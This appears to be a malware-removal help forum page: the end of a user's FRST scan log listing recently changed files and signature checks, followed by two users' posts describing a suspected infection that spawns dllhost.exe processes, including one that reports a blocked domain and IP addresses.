2014-09-06 22:47 - 2012-06-08 11:43 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job 2014-09-06 22:42 - 2012-06-08 11:43 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job 2014-09-06 22:41 - 2013-06-19 11:06 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-09-06 22:06 - 2012-06-10 23:14 - 01320443 _____ () C:\Windows\WindowsUpdate.log 2014-09-06 22:01 - 2009-07-14 01:13 - 00782922 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-09-06 21:59 - 2009-07-14 00:45 - 00022224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-09-06 21:59 - 2009-07-14 00:45 - 00022224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-09-06 21:55 - 2014-09-02 21:42 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-06 21:53 - 2013-06-19 11:06 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-09-06 21:52 - 2014-09-06 21:52 - 00133028 _____ () C:\Windows\SysWOW64\api_hook_list.dat 2014-09-06 21:52 - 2014-09-06 21:52 - 00002033 _____ () C:\Windows\system32\api_hook_list.dat 2014-09-06 21:51 - 2012-06-25 12:21 - 00244082 _____ () C:\Windows\PFRO.log 2014-09-06 21:51 - 2012-06-10 23:12 - 00058134 _____ () C:\Windows\setupact.log 2014-09-06 21:51 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-09-06 21:35 - 2013-06-19 11:06 - 00000000 ____D () C:\Program Files (x86)\Google 2014-09-06 21:34 - 2013-06-19 11:06 - 00000000 ____D () C:\Users\akumar\AppData\Local\Google 2014-09-06 21:31 - 2014-09-06 21:31 - 00019523 _____ () C:\Users\akumar\Desktop\bookmarks_9_6_14.html 2014-09-06 11:11 - 2013-06-12 14:02 - 00000000 ____D () C:\Users\akumar\Documents\Outlook Files 2014-09-06 08:55 - 2009-07-14 00:45 - 00439088 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-09-06 00:38 - 2014-09-06 00:38 - 00000000 ____D () C:\Program Files (x86)\ESET 2014-09-06 00:37 - 2014-09-06 00:37 - 02347384 _____ (ESET) C:\Users\akumar\Downloads\esetsmartinstaller_enu(1).exe 2014-09-05 23:58 - 2014-09-05 23:58 - 00001249 _____ () C:\Users\akumar\Desktop\JRT.txt 2014-09-05 22:52 - 2014-09-05 22:52 - 00000000 ____D () C:\Windows\ERUNT 2014-09-05 22:51 - 2014-09-05 22:50 - 01016261 _____ (Thisisu) C:\Users\akumar\Downloads\JRT.exe 2014-09-05 19:26 - 2014-09-05 18:44 - 00000000 ____D () C:\AdwCleaner 2014-09-05 19:25 - 2012-06-08 10:32 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-09-05 18:44 - 2014-09-05 18:44 - 01370467 _____ () C:\Users\akumar\Downloads\AdwCleaner.exe 2014-09-05 17:12 - 2014-04-15 10:30 - 00000000 ____D () C:\Users\akumar\AppData\Roaming\.purple 2014-09-05 16:37 - 2014-09-05 16:37 - 00001155 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2014-09-05 16:37 - 2014-09-05 16:37 - 00001143 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk 2014-09-05 16:37 - 2012-08-08 09:29 - 00000000 ____D () C:\Users\akumar\AppData\Local\Mozilla 2014-09-05 16:36 - 2014-09-05 16:36 - 00000000 ____D () C:\ProgramData\Mozilla 2014-09-05 16:36 - 2014-09-05 16:36 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-09-05 16:33 - 2014-09-05 16:32 - 35678152 _____ () C:\Users\akumar\Downloads\Firefox Setup 32.0.exe 2014-09-05 15:30 - 2014-09-05 15:30 - 00001233 _____ () C:\Users\akumar\Downloads\stmt (1).txt 2014-09-05 15:16 - 2014-09-05 15:16 - 00001459 _____ () C:\Users\akumar\Downloads\stmt.txt 2014-09-05 14:23 - 2014-09-05 14:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Split & Merge 2014-09-05 14:23 - 2014-09-05 14:23 - 00000000 ____D () C:\Program Files\PDF Split & Merge 2014-09-05 14:22 - 2014-09-05 14:22 - 01226124 _____ (Bureausoft Corporation ) C:\Users\akumar\Downloads\pdfsm.exe 2014-09-05 14:09 - 2014-06-25 12:20 - 00000000 ____D () C:\Quarantine 2014-09-05 14:08 - 2014-09-05 14:08 - 21467591 _____ (Andrea Vacondio) C:\Users\akumar\Downloads\download 2014-09-05 09:55 - 2012-01-18 09:40 - 00000000 ____D () C:\Users\Administrator 2014-09-05 09:48 - 2013-06-19 11:08 - 00000000 ____D () C:\Users\akumar\AppData\Local\Real 2014-09-04 23:16 - 2014-09-04 23:16 - 02347384 _____ (ESET) C:\Users\akumar\Downloads\esetsmartinstaller_enu.exe 2014-09-04 21:51 - 2014-09-04 21:51 - 00000904 _____ () C:\Users\akumar\Downloads\fixlist.txt 2014-09-04 21:31 - 2014-09-04 21:30 - 00061031 _____ () C:\Users\akumar\Downloads\Addition.txt 2014-09-04 21:31 - 2014-09-04 21:27 - 00067738 _____ () C:\Users\akumar\Downloads\FRST.txt 2014-09-04 21:26 - 2014-09-04 21:26 - 02104832 _____ (Farbar) C:\Users\akumar\Downloads\FRST64.exe 2014-09-04 21:17 - 2014-09-04 21:17 - 01096704 _____ (Farbar) C:\Users\akumar\Downloads\FRST.exe 2014-09-04 16:52 - 2013-08-19 17:05 - 00000000 ____D () C:\Users\akumar\Documents\IPv4-IPv6 support 2014-09-04 14:08 - 2014-02-27 11:21 - 00003346 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-998467208-754410358-1295600288-10396 2014-09-04 14:08 - 2014-02-27 11:21 - 00003214 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-998467208-754410358-1295600288-10396 2014-09-04 10:48 - 2014-09-04 10:48 - 00198656 _____ () C:\Users\akumar\Downloads\Oracle_AcmePacket_FINAL_3GPP 23228 PICS.xls 2014-09-03 15:46 - 2014-09-03 15:46 - 00198656 _____ () C:\Users\akumar\Downloads\AcmePacket_FINAL_3GPP 23228 PICS (1).xls 2014-09-03 15:45 - 2014-09-03 15:45 - 00198656 _____ () C:\Users\akumar\Downloads\AcmePacket_FINAL_3GPP 23228 PICS.xls 2014-09-03 11:10 - 2009-07-14 01:32 - 00000000 ____D () C:\Windows\system32\FxsTmp 2014-09-02 22:46 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\security 2014-09-02 21:41 - 2014-09-02 21:41 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-02 21:41 - 2014-09-02 21:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-02 21:40 - 2014-09-02 21:39 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-09-02 21:39 - 2014-09-02 21:39 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-02 21:38 - 2014-09-02 21:37 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\akumar\Downloads\mbam-setup-2.0.2.1012.exe 2014-08-29 23:10 - 2014-08-29 23:10 - 00789914 _____ () C:\Users\akumar\Downloads\Scanned_object_3 (2).tif 2014-08-29 23:10 - 2014-08-29 23:10 - 00094102 _____ () C:\Users\akumar\Downloads\Scanned_object_4 (1).tif 2014-08-29 23:10 - 2014-08-29 23:10 - 00069283 _____ () C:\Users\akumar\Downloads\Scanned_object_2 (1).tif 2014-08-29 23:09 - 2014-08-29 23:09 - 00175619 _____ () C:\Users\akumar\Downloads\Scanned_object_0 (1).tif 2014-08-29 23:09 - 2014-08-29 23:09 - 00038525 _____ () C:\Users\akumar\Downloads\Scanned_object_1 (1).tif 2014-08-29 23:08 - 2014-08-29 23:08 - 00789914 _____ () C:\Users\akumar\Downloads\Scanned_object_3 (1).tif 2014-08-29 23:07 - 2014-08-29 23:07 - 00118388 _____ () C:\Users\akumar\Downloads\Scanned_object_1.tif 2014-08-29 23:07 - 2014-08-29 23:07 - 00088142 _____ () C:\Users\akumar\Downloads\Scanned_object_2.tif 2014-08-29 23:06 - 2014-08-29 23:06 - 00724152 _____ () C:\Users\akumar\Downloads\Scanned_object_3.tif 2014-08-29 23:06 - 2014-08-29 23:06 - 00072460 _____ () C:\Users\akumar\Downloads\Scanned_object_4.tif 2014-08-29 23:06 - 2014-08-29 23:05 - 00120548 _____ () C:\Users\akumar\Downloads\Scanned_object_5.tif 2014-08-29 23:04 - 2014-08-29 23:04 - 00082421 _____ () C:\Users\akumar\Downloads\Scanned_object_0.tif 2014-08-29 16:28 - 2012-07-05 10:14 - 00000000 ____D () C:\Users\akumar\Documents\Weekly Reports 2014-08-28 13:58 - 2012-12-04 15:02 - 00000000 ____D () C:\Users\akumar\Documents\SMX 2014-08-28 11:12 - 2014-08-28 11:12 - 01600196 _____ () C:\Users\akumar\Downloads\PLSuite training LT.pptx 2014-08-28 11:10 - 2014-08-28 11:09 - 05229194 _____ () C:\Users\akumar\Downloads\PLSuite training_indepth_LT.pptx 2014-08-28 10:08 - 2014-08-28 10:08 - 00472060 _____ () C:\Users\akumar\Downloads\Attachments_2014828.zip 2014-08-27 22:08 - 2014-08-27 22:08 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close (2).xls 2014-08-27 21:35 - 2014-08-27 21:35 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close (1).xls 2014-08-27 21:32 - 2014-08-27 21:32 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close.xls 2014-08-27 16:35 - 2014-08-27 16:35 - 00271872 _____ () C:\Users\akumar\Downloads\1-PLM (5).ppt 2014-08-26 16:37 - 2014-08-26 16:37 - 00501672 _____ () C:\Users\akumar\Downloads\Attachments_2014826.zip 2014-08-22 14:17 - 2014-08-22 14:17 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases (2).xlsx 2014-08-22 09:41 - 2014-08-22 09:41 - 00272384 _____ () C:\Users\akumar\Downloads\1-PLM (4).ppt 2014-08-21 16:04 - 2014-08-21 16:04 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases.xlsx 2014-08-21 16:04 - 2014-08-21 16:04 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases (1).xlsx 2014-08-19 23:07 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache 2014-08-19 11:05 - 2014-08-19 11:05 - 00003806 _____ () C:\Users\akumar\Downloads\MC_854_CURRENT_VIEW (1).CSV 2014-08-19 11:04 - 2014-08-19 11:04 - 00001049 _____ () C:\Users\akumar\Downloads\MC_854_CURRENT_VIEW.CSV 2014-08-19 10:06 - 2014-08-19 10:06 - 01245025 _____ () C:\Users\akumar\Downloads\Attachments_2014819.zip 2014-08-16 21:20 - 2013-12-16 00:00 - 00000000 ___RD () C:\Program Files (x86)\Skype 2014-08-16 10:05 - 2012-01-18 12:48 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-08-15 09:52 - 2014-08-15 09:52 - 00271872 _____ () C:\Users\akumar\Downloads\1-PLM (3).ppt 2014-08-15 09:51 - 2014-08-15 09:51 - 00277504 _____ () C:\Users\akumar\Downloads\1-PLM (2).ppt 2014-08-15 09:48 - 2014-08-15 09:48 - 00277504 _____ () C:\Users\akumar\Downloads\1-PLM (1).ppt 2014-08-13 15:46 - 2014-08-13 15:46 - 00027239 _____ () C:\Users\akumar\Downloads\RCS 5.1 SoC_v01.xlsx 2014-08-13 10:46 - 2014-08-13 10:46 - 00680960 _____ () C:\Users\akumar\Downloads\APKT_Standards_v16_working_121106 (1).xls 2014-08-13 10:43 - 2014-08-13 10:43 - 00455158 _____ () C:\Users\akumar\Downloads\33328-c50.zip 2014-08-13 10:32 - 2014-08-13 10:32 - 00221872 _____ () C:\Users\akumar\Downloads\33210-c20.zip 2014-08-13 10:25 - 2014-08-13 10:25 - 00758356 _____ () C:\Users\akumar\Downloads\33203-c40.zip 2014-08-13 10:21 - 2014-08-13 10:21 - 00169527 _____ () C:\Users\akumar\Downloads\33141-c00.zip 2014-08-13 10:10 - 2014-08-13 10:10 - 02114023 _____ () C:\Users\akumar\Downloads\33107-c50.zip 2014-08-12 16:40 - 2014-08-12 16:40 - 00181620 _____ () C:\Users\akumar\Downloads\32600-b00.zip 2014-08-12 16:37 - 2014-08-12 16:37 - 00379072 _____ () C:\Users\akumar\Downloads\32423-b70.zip 2014-08-12 16:33 - 2014-08-12 16:33 - 00649990 _____ () C:\Users\akumar\Downloads\32409-b40.zip 2014-08-12 16:31 - 2014-08-12 16:31 - 00177152 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-299 PICS.xls 2014-08-12 16:29 - 2014-08-12 16:29 - 00156672 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-299 PICS-7.1.2.xls 2014-08-12 16:25 - 2014-08-12 16:25 - 00020912 _____ () C:\Users\akumar\Downloads\PICS for 32.260 (rel 11)-7.1.2.xlsx 2014-08-12 16:25 - 2014-08-12 16:25 - 00016330 _____ () C:\Users\akumar\Downloads\PICS for 32.240 (rel 11)-7.1.2.xlsx 2014-08-12 16:23 - 2014-08-12 16:23 - 00135680 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-240 PICS.xls 2014-08-12 16:19 - 2014-08-12 16:19 - 00840537 _____ () C:\Users\akumar\Downloads\32102-b20.zip 2014-08-12 16:17 - 2014-08-12 16:17 - 01255427 _____ () C:\Users\akumar\Downloads\32101-b10.zip 2014-08-12 16:17 - 2014-08-12 16:17 - 01116048 _____ () C:\Users\akumar\Downloads\32101-a10.zip 2014-08-12 16:12 - 2014-08-12 16:12 - 00374456 _____ () C:\Users\akumar\Downloads\29658-c00.zip 2014-08-12 16:09 - 2014-08-12 16:09 - 00439375 _____ () C:\Users\akumar\Downloads\29333-b30.zip 2014-08-12 16:06 - 2014-08-12 16:06 - 00200868 _____ () C:\Users\akumar\Downloads\29329-b70.zip 2014-08-12 16:03 - 2014-08-12 16:03 - 00894564 _____ () C:\Users\akumar\Downloads\29328-bb0.zip 2014-08-12 16:01 - 2014-08-12 16:01 - 00081539 _____ () C:\Users\akumar\Downloads\29278-c00.zip 2014-08-12 15:58 - 2014-08-12 15:58 - 00040447 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_29-228 PICS.xlsx 2014-08-12 15:53 - 2014-08-12 15:53 - 03680379 _____ () C:\Users\akumar\Downloads\29163-bb0.zip 2014-08-12 15:17 - 2014-08-12 15:17 - 00593322 _____ () C:\Users\akumar\Downloads\29162-b20.zip 2014-08-12 15:14 - 2014-08-12 15:14 - 05833886 _____ () C:\Users\akumar\Downloads\29002-c00.zip 2014-08-12 15:03 - 2014-08-12 15:02 - 05595884 _____ () C:\Users\akumar\Downloads\29002-ba0.zip 2014-08-12 01:11 - 2013-06-03 13:01 - 00141472 _____ (McAfee, Inc.) C:\Windows\SysWOW64\KevlarSigs.dll 2014-08-11 17:17 - 2013-12-23 16:53 - 00000000 ____D () C:\Users\akumar\Documents\SR 2014-08-11 10:45 - 2014-08-11 10:44 - 07804815 _____ () C:\Users\akumar\Downloads\cnt2109553.pptx 2014-08-08 15:07 - 2014-08-08 15:07 - 01539298 _____ () C:\Users\akumar\Downloads\26173-b00 (1).zip 2014-08-08 15:07 - 2014-08-08 15:06 - 01539298 _____ () C:\Users\akumar\Downloads\26173-b00.zip 2014-08-08 15:03 - 2014-08-08 15:03 - 00194939 _____ () C:\Users\akumar\Downloads\26171-b00.zip 2014-08-08 14:59 - 2014-08-08 14:59 - 02605148 _____ () C:\Users\akumar\Downloads\26114-c60.zip 2014-08-08 14:50 - 2014-08-08 14:50 - 01047644 _____ () C:\Users\akumar\Downloads\26073-b00.zip 2014-08-08 14:42 - 2014-08-08 14:42 - 00321588 _____ () C:\Users\akumar\Downloads\26071-b00.zip 2014-08-08 14:40 - 2014-08-08 14:39 - 00439171 _____ () C:\Users\akumar\Downloads\24647-c00.zip 2014-08-08 14:38 - 2014-08-08 14:38 - 00464511 _____ () C:\Users\akumar\Downloads\24642-c00.zip 2014-08-08 14:35 - 2014-08-08 14:35 - 00256205 _____ () C:\Users\akumar\Downloads\24629-c40.zip 2014-08-08 14:34 - 2014-08-08 14:34 - 00938903 _____ () C:\Users\akumar\Downloads\24628-c30.zip 2014-08-08 14:31 - 2014-08-08 14:31 - 00161073 _____ () C:\Users\akumar\Downloads\24623-c30.zip 2014-08-08 14:29 - 2014-08-08 14:29 - 00318647 _____ () C:\Users\akumar\Downloads\24615-b30.zip 2014-08-08 14:28 - 2014-08-08 14:28 - 00208014 _____ () C:\Users\akumar\Downloads\24611-c30.zip 2014-08-08 14:27 - 2014-08-08 14:27 - 00193743 _____ () C:\Users\akumar\Downloads\24610-b30.zip 2014-08-08 14:24 - 2014-08-08 14:24 - 00153761 _____ () C:\Users\akumar\Downloads\24608-b30.zip 2014-08-08 14:15 - 2014-08-08 14:15 - 00159923 _____ () C:\Users\akumar\Downloads\24607-c00.zip 2014-08-08 14:12 - 2014-08-08 14:12 - 00331974 _____ () C:\Users\akumar\Downloads\24605-b10.zip 2014-08-08 14:03 - 2014-08-08 14:03 - 00306914 _____ () C:\Users\akumar\Downloads\24604-b90.zip 2014-08-08 13:42 - 2014-08-08 13:42 - 01327830 _____ () C:\Users\akumar\Downloads\24292-b80.zip 2014-08-08 10:56 - 2014-08-08 10:56 - 03602825 _____ () C:\Users\akumar\Downloads\24237-c30.zip 2014-08-08 10:51 - 2014-08-08 10:51 - 00160406 _____ () C:\Users\akumar\Downloads\24173-c00.zip 2014-08-08 10:46 - 2014-08-08 10:46 - 00703453 _____ () C:\Users\akumar\Downloads\24147-b20.zip 2014-08-08 10:39 - 2014-08-08 10:39 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (3).xlsx 2014-08-08 09:59 - 2014-08-08 09:59 - 00276992 _____ () C:\Users\akumar\Downloads\1-PLM.ppt 2014-08-07 14:57 - 2014-08-07 14:57 - 00726086 _____ () C:\Users\akumar\Downloads\24141-c10.zip 2014-08-07 14:47 - 2014-08-07 14:47 - 00392134 _____ () C:\Users\akumar\Downloads\23517-800.zip 2014-08-07 14:30 - 2014-08-07 14:30 - 01524884 _____ () C:\Users\akumar\Downloads\23335-b00.zip 2014-08-07 14:03 - 2014-08-07 14:03 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (2).xlsx 2014-08-07 14:02 - 2014-08-07 14:02 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (1).xlsx ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-29 23:33 ==================== End Of Log ============================ Addition.txt
  12. I have a PC that appears to be infected with something. Whenever using the internet numerous dllhost.exe processes start until CPU usage spikes at 100%. I have tried running virus scans (using Vipre antivirus) and also ran Malwarebytes normally and in safe mode several times, but the issue remains. I have been reading some of the other topics that sound like this issue as well that you've been able to help. I hope you're able to help me as well.
  13. I'm not sure how much to say on here as I don't want to leave myself vulnerable to further attacks. I'm really reporting this to Malwarebytes to stop this problem. I can't find nay reference to the Trojan file name or a key in my registry called Etkthion. I can't view the windows/current version/run and I think it's corrupted by tis malware. I get dllhosts.exe growing (you can see these in process explorer or task manager) and odd files appearing in my temp folder at the same time. No malware has stopped this though I do so manually, but it recurs. This one did find a Trojan Fake MS folder which made the scan crash but I deleted it myself. It was called idosivabdi.dat. There was also a decrypt instruction to a long strange website which I can't cut and pas I also get pop up warnings from Malwarebytes that a malicious website is being blocked, domain cd5c5s.com and two outgoing IPs 31.184.192.202/213 and through my dllhost.exe, process that lives in the Windows/systwow64 folder. I suspect a rootkit and am frustrated by the time wasted. if anyone posts some suggestions, please remember to explain what things are and what I am being asked to do. I am not prepared to allow third party access or posts logs etc here for security reasons. but I hope this information helps stop the website/hackers Why can't we cut and paste - this has been so laborious when I'd written it all out ready
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.